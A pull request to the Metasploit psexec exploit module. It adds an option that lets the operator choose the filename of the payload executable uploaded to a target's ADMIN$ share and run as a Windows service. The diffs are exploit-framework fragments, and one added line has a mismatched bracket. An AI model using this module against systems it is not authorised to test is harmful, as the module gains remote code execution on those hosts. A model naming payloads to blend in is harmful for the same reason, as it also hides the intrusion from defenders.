### PR TITLE
Allow user ability to set filename for psexec service binary

### DIFF
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -125,6 +125,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			report_auth_info(report_hash)
 		end
 
+		filename = datastore['SERVICE_FILENAME'] ? datastore['SERVICE_FILENAME'] : rand_text_alpha(8) + ".exe"
+
 		if datastore['MOF_UPLOAD_METHOD']
 			# payload as exe
 			print_status("Trying wbemexec...")
@@ -134,7 +136,6 @@ class Metasploit3 < Msf::Exploit::Remote
 				return
 			end
 			simple.connect("ADMIN$")
-			datastore['SERVICE_FILENAME'] ? filename = datastore['SERVICE_FILENAME'] : filename = rand_text_alpha(8) + ".exe"
 			exe = generate_payload_exe
 			fd = smb_open("\\system32\\#{filename}", 'rwct')
 			fd << exe
@@ -153,7 +154,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			# Disconnect from the ADMIN$
 			simple.disconnect("ADMIN$")
 		else
-			datastore['SERVICE_FILENAME'] ? filename = datastore['SERVICE_FILENAME'] : filename = rand_text_alpha(8) + ".exe"
 			servicename = rand_text_alpha(8)
 
 			# Upload the shellcode to a file

--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -82,7 +82,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_advanced_options(
 			[
 				OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true]),
-				OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false])
+				OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
+				OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil)
 			], self.class)
 	end
 
@@ -133,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				return
 			end
 			simple.connect("ADMIN$")
-			filename = rand_text_alpha(8) + ".exe"
+			datastore['SERVICE_FILENAME'] ? filename = datastore['SERVICE_FILENAME'] : filename = rand_text_alpha(8) + ".exe"
 			exe = generate_payload_exe
 			fd = smb_open("\\system32\\#{filename}", 'rwct')
 			fd << exe
@@ -152,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			# Disconnect from the ADMIN$
 			simple.disconnect("ADMIN$")
 		else
-			filename = rand_text_alpha(8) + ".exe"
+			datastore['SERVICE_FILENAME'] ? filename = datastore['SERVICE_FILENAME'] : filename = rand_text_alpha(8) + ".exe"
 			servicename = rand_text_alpha(8)
 
 			# Upload the shellcode to a file


### PR DESCRIPTION
This should probably be higher up for all
generate_payload_exe but would take a major edit
